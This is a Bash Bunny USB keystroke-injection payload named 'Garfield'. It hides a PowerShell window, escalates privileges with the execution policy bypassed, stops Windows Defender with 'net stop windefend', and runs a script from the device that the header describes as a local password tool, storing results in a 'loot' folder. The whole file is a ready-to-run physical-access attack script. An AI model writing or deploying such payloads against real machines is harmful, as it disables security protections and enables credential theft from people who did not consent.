############################################################################################
# Name: Garfield
# Purpose: Disable Windows Defender, run local password tool.
# Version: 1.0
# Author: Mike Galvin
# Contact: mike@gal.vin or twitter.com/mikegalvin_
# Date: 2019-10-15
#############################################################################################

#!/bin/bash

# Options
LOOTDIR=/root/udisk/loot/LocalPwn

######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE

######## MAKE LOOT DIRECTORY ########
mkdir -p $LOOTDIR

######## ATTACK ########
LED ATTACK
RUN WIN "PowerShell.exe -noe -c ". mode.com con: lines=1 cols=12""
#RUN WIN "PowerShell.exe"
sleep 2
Q STRING "\$src1 = (gwmi win32_volume -f 'label=''BashBunny''').Name+'bin\runasti64 powershell'"
Q ENTER
sleep 1
Q STRING "powershell -ep bypass \$src1"
Q ENTER
sleep 5
Q ALT Y
sleep 2
Q STRING "net stop windefend | Out-Null"
Q ENTER
sleep 1
Q STRING "exit"
Q ENTER
sleep 2
Q STRING "\$src = (gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch2\g.ps1'"
Q ENTER
sleep 1
Q STRING "powershell -ep bypass \$src"
Q ENTER
sleep 1
Q STRING "exit"
Q ENTER

######## FINISH ########
LED FINISH
